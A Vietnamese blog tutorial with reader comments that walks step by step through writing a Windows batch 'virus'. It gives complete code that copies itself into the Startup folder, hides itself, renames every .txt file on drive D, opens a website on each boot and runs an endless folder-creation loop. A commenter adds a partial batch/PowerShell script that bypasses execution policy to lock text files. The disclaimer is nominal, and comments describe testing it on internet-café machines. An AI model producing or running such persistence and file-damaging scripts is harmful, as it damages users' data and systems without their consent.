Chào các bạn, hôm nay AnonyViet sẽ hướng dẫn chi tiết các bạn viết một chương trình Virus cực kỳ đơn giản, qua bài viết này sẽ giúp các bạn nắm thêm kiến thức về lệnh CMD trong Windows, từ đó làm nền tảng để hiểu thêm Power Shell nếu bạn nào thích nghiên cứu chuyên sâu.
Tham gia kênh Telegram của AnonyViet 👉 Link 👈 |
Trong bài này chúng tôi sẽ diễn giải các lệnh cơ bản nhất của CMD, và tùy theo tư duy các bạn có thể phát triển để virus này nguy hiểm hơn. Tuy nhiên với mục đích là để tìm tòi nghiên cứu học hỏi chứ không phải phá hoại, do đó các bạn đừng nên sử dụng kiến thức của mình đi để phá người khác nhé.
Bây giờ chúng ta sẽ đi từng lệnh cụ thể trong CMD, sau đó ráp lại thành 1 bộ code hoàn chỉnh để thực thi virus nhé.
Bài 1: Hướng dẫn tự viết Virus cực mạnh phá Windows
Bài 2: Tăng thêm sức mạnh cho Virus phá Windows
Chuẩn bị
- Notepad
- Mở CMD (nhấn phím Windows R, gõ lên cmd)
- Dùng máy ảo hoặc ra quán net để Test
Xác định thư mục làm việc
Trước tiên ta cần trỏ dấu nhắc đợi lệnh về 1 đường dẫn cố định để dễ test. Trong bài này, mình sẽ để đường dẫn là ổ đĩa D: cho dễ quản lý
Gõ lệnh:
D:
khi đấy đường dẫn làm việc của ta sẽ là ổ đĩa D:
Tạo File bằng lệnh echo
Để tạo ra con virus tất nhiên bạn phải ra file chứa các lệnh thực thi con virus ấy, trong CMD chúng ta dùng lệnh echo để tạo file có nội dung, với cấu trúc lệnh như sau:
echo > virus.bat
Lệnh này cho phép ta tạo ra một file tên là virus.bat, nhưng chưa có nội dung.
Tiếp đến ta thêm nội dung cho file virus.bat bằng lệnh:
echo off: dùng để tắt hiển thị lệnh khi thực thi file
echo echo off > x.bat echo "noi dung dong 1" >> virus.bat echo "noi dung dong 2" >> virus.bat echo "noi dung dong 3" >> virus.bat
Tóm lại:
- 1 dấu > là tạo file
- 2 dấu >> là thêm nội dung file
Bây giờ chúng ta truy cập vào ổ đĩa D: sẽ thấy có 1 file tên là virus.bat, và dùng notepad để mở file này nên sẽ thấy các nội dung như hình bên dưới
Đổi màu chữ trong CMD
Để làm con em virus thêm sinh động thì chúng ta có thể đổi màu chữ từ màu trắng cổ điển sau các màu khác như xanh, đỏ, tím, vàng…. Bạn sử dụng lệnh: color số quy định màu.
Ví dụ: để chuyển chữ sang màu xanh lá cây, mã màu là số 2 thì ta gõ lệnh
color 2
Dùng lệnh Copy để sao chép
Nếu muốn Virus này ẩn mình vào 1 thư mục nào đó, hoặc muốn cho em virus này khởi động theo Windows, mỗi lần khởi động Windows lên Virus sẽ tự thực thi, thì cần cho nó tự sao chép vào đường dẫn Startup.
Thư mục nơi chứa các tập tin để được khởi động cùng Windows được quy định là
"C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"
Do đó ta cần copy con Virus này vào thư mục trên, sử dụng lệnh Windows
copy virus.bat "C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"
Cách ẩn mình của Virus
Để ẩn mình, tránh sự phát hiện bằng mắt thường, mình sẽ dùng lệnh attrib để tự đặt chế độ ẩn file.
Do mình đã copy virus này vào thư mục Startup, nên cần phải di chuyển dấu nhắc đợi lệnh về thư mục đó, dùng lệnh cd để di chuyển dấu nhắc
cd "C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"
Tiếp đến dùng lệnh attrib để ẩn file
attrib +h virus.bat
Đổi đuôi File
Để tăng phần nguy hiểm cho Virus thì chúng ta sẽ cho đổi đuôi tất cả các File tìm thấy về 1 đuôi khác do bạn quy định, dùng lệnh ren.
Ví dụ: để đổi tất cả các file có đuôi .exe về đuôi .anonyviet thì ta dùng lệnh:
ren *.exe *.anonyviet
Ví dụ: để đổi tất cả các file và tất cả các đuôi về đuôi .anonyviet thì ta dùng lệnh:
ren *.* *.anonyviet
*.* //tất cả các file và tất cả các đuôi
*.anonyviet // đổi hết về đuôi .anonyviet
Thực thi File
Để virus tự kích hoạt một file bất kỳ hoặc kích hoạt chính mình thì dùng lệnh
start “tên chương trình muốn kích hoạt”
Ví dụ: muốn Virus tự mở website anonyviet.con thì dùng lệnh
start https://anonyviet.com
Ví dụ: muốn Virus tự mở kích hoạt file virus.bat
start d:\virus.bat
Vòng lặp
Các bạn mở 1 file notepad ra và gõ lệnh bên dưới, sau đó save 1 file với len vonglap.bat, để xem cách hoạt động nhé
Các bạn xem ví dụ bên dưới nhé:
@echo off d: cd virus :x md %random% goto x
d: //đi đến thư mục làm việc ổ đĩa D:
md anonyviet // tạo thư mục có tên
cd anonyviet // di chuyển con trỏ vào thư mục anonyviet
: x là điểm bắt đầu vòng lặp
md: lệnh tạo thư mục
%ramdom%: lệnh tạo ra các con số ngẫu nhiên
goto x trở về điểm bắt đầu
Như vậy, đường đi sẽ là:
- Lệnh thực thi đến phần x,
- Nó sẽ tạo ra 1 thư mục với tên ngẫu nhiên,
- Gặp goto x lệnh sẽ quay lại x
- Và tiếp tục tạo 1 thư mục với tên ngẫu nhiên
- Rồi gặp goto x, nó lại quay về x
- Và tiếp tục tạo thư mục
Tạo nên 1 vòng lặp vô tận.
Bài tập viết virus đơn giản bằng cmd:
Hoàn thành code 1 virus đơn giản với yêu cầu
- Tạo ra tạo 1 file có tên virus.bat nằm trong ổ đĩa D:
- Nội dung file virus.bat hiển thị dòng chữ AnonyViet is Attacking, có màu xanh lá cây
- File Virus này sẽ đổi đuôi tất cả tập tin .txt trong ổ D về thành đuôi .anonyviet
- Tự copy vào thư mục Startup của Windows
- Tự ẩn giấu mình
- Tự kích hoạt anonyviet.bat
OK bây giờ chúng ta mở notepad lên và gõ các lệnh như sau:
Bài giải:
Bước 1: Mở notepad lên và gõ lại theo các lệnh dưới đây,
Bước 2: save file notepad là baigiai.bat
Bước 3: Thực thi file baigiai.bat và xem kết quả
Bước 4: Khởi động lại máy và xem kết quả
Chi tiết bài giải
- Tạo ra tạo 1 file anonyviet.bat trong ổ D: bằng lệnh echo
D: echo @echo off > anonyviet.bat echo color 2 >> anonyviet.bat echo echo. AnonyViet is Attacking >> anonyviet.bat
2. File Virus này sẽ đổi đuôi tất cả tập tin .txt trong ổ D về thành đuôi .anonyviet
D: echo @echo off > anonyviet.bat echo color 2 >> anonyviet.bat echo echo. AnonyViet is Attacking >> anonyviet.bat
3. File Virus này sẽ đổi đuôi tất cả tập tin .txt trong ổ D về thành đuôi .anonyviet
D: echo @echo off > anonyviet.bat echo color 2 >> anonyviet.bat echo echo. AnonyViet is Attacking >> anonyviet.bat echo ren *.txt *.anonyviet >> anonyviet.bat
4. Tự mở trang web https://anonyviet.com
D: echo @echo off > anonyviet.bat echo color 2 >> anonyviet.bat echo echo. AnonyViet is Attacking >> anonyviet.bat echo ren *.txt *.anonyviet >> anonyviet.bat echo start https://anonyviet.com
4. Tự copy vào thư mục Startup của Windows
D: echo @echo off > anonyviet.bat echo color 2 >> anonyviet.bat echo echo. AnonyViet is Attacking >> anonyviet.bat echo ren *.txt *.anonyviet >> anonyviet.bat echo start https://anonyviet.com copy anonyviet.bat "C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"
5. Tự ẩn giấu mình
D: echo @echo off > anonyviet.bat echo color 2 >> anonyviet.bat echo echo. AnonyViet is Attacking >> anonyviet.bat echo ren *.txt *.anonyviet >> anonyviet.bat echo start https://anonyviet.com >> anonyviet.bat copy anonyviet.bat "C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup" echo attrib +h "C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\anonyviet.bat" >> anonyviet.bat echo pause >> anonyviet.bat
6. Thực thi file anonyviet.bat
D: echo @echo off > anonyviet.bat echo color 2 >> anonyviet.bat echo echo. AnonyViet is Attacking >> anonyviet.bat echo ren *.txt *.anonyviet >> anonyviet.bat echo start https://anonyviet.com >> anonyviet.bat copy anonyviet.bat "C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup" echo attrib +h "C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\anonyviet.bat" >> anonyviet.bat echo pause >> anonyviet.bat start anonyviet.bat
Bây giờ bạn Save code này vào notepad đặt tên baigiai.bat
Rồi khởi động file baigiai.bat để xem kết quả
Như vậy với các đoạn code trên, mỗi khi ban khởi động Windows, nó sẽ tự tìm kiếm trong ổ D các file có đuôi .txt sẽ tự chuyển qua đuôi .anonyviet và khởi động là website của AnonyViet lên.
Bài thứ 2 mình đang viết, sẽ thêm sức mạnh cho con virus này, các bạn đón đọc nhé
Đã test ngoài net và ăn hành ngay sau đó 🙂 đm ad
1 Thanh niên đã bị ăn hành chia sẽ
không biết vị của hành có ngon ko nữa :V
Đm các bác -_-
hành ngon không bác :V
Không có ngon chút nào
t bán hành nè , mua ko :V
Dạ cho em 1 túi :v à mà thôi không spam nha bạn ^^
Cho em 1kg đêm qua mỹ ạ
Bị hành cũng chia sẻ
Cảm ơn ad đã share bài cho ae học hỏi
Nhớ ủng hộ
Cảm ơn ad nhiều
Cho hỏi ad ơi nếu ngoài start anonyviet.com, mình để thêm vài website nữa cho nó bật lên cùng lúc cho nó lag luôn đc ko
chắc là đc, minh cx đang thắc mác
virus này phá hoại đc những gì vậy mn?
ad ơi em sửa đc con pc đó rồi
nó có thể tấn công vào đâu
add cho em hỏi là sau khi bật lên rồi muốn tắt đi thì làm thế nào ạ
bạn vào thư mục “C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup” xóa file đi
em muốn sửa lệnh cmd khóa file text trong tất cả các thư mục ở ổ đĩa D và E
và không cần tạo thư mục locker ở desktop nữa
dưới này là lệnh cmd
@echo off
mode con:cols=80 lines=30
cls
if NOT EXIST “%UserProfile%\Desktop\Locker\” GOTO SETUP
if EXIST “%UserProfile%\Desktop\Locker\*.locker” GOTO CHECKKEY
if NOT EXIST “%UserProfile%\Desktop\Locker\*.locker” GOTO LOCK
:LOCK
mkdir %UserProfile%\Desktop\Locker >NUL 2>NUL
>nul 2>nul dir /a-d “%UserProfile%\Desktop\Locker\*” && (powershell.exe -executionpolicy bypass “%~dp0\lock.ps1”) && (attrib +s -h %UserProfile%\Desktop\Locker) || (echo No files found in Locker..)
echo.
echo Encryption Process… DONE
pause >NUL
đây là đoạn code powershell
$scriptpath = $MyInvocation.MyCommand.Path
$dir = Split-Path $scriptpath
$desktop = [Environment]::GetFolderPath(“Desktop”)
$templockdir = “$desktop\Locker”
$unlockedfiles = Get-ChildItem -Path “$templockdir” -Include “*.txt” -Recurse
$pcname = $env:computername
$lockerkeys = “$dir\lockerkeys”
may chưa thử trên máy. mới thử trên máy ảo. DM ad ad ccos mua hành không
Bạn ơi, mình ko có ổ đĩa D
XD Hài vãi
cái đoạn coppy là mik vẫn làm trên cmd hả ad hay là làm trên notepad z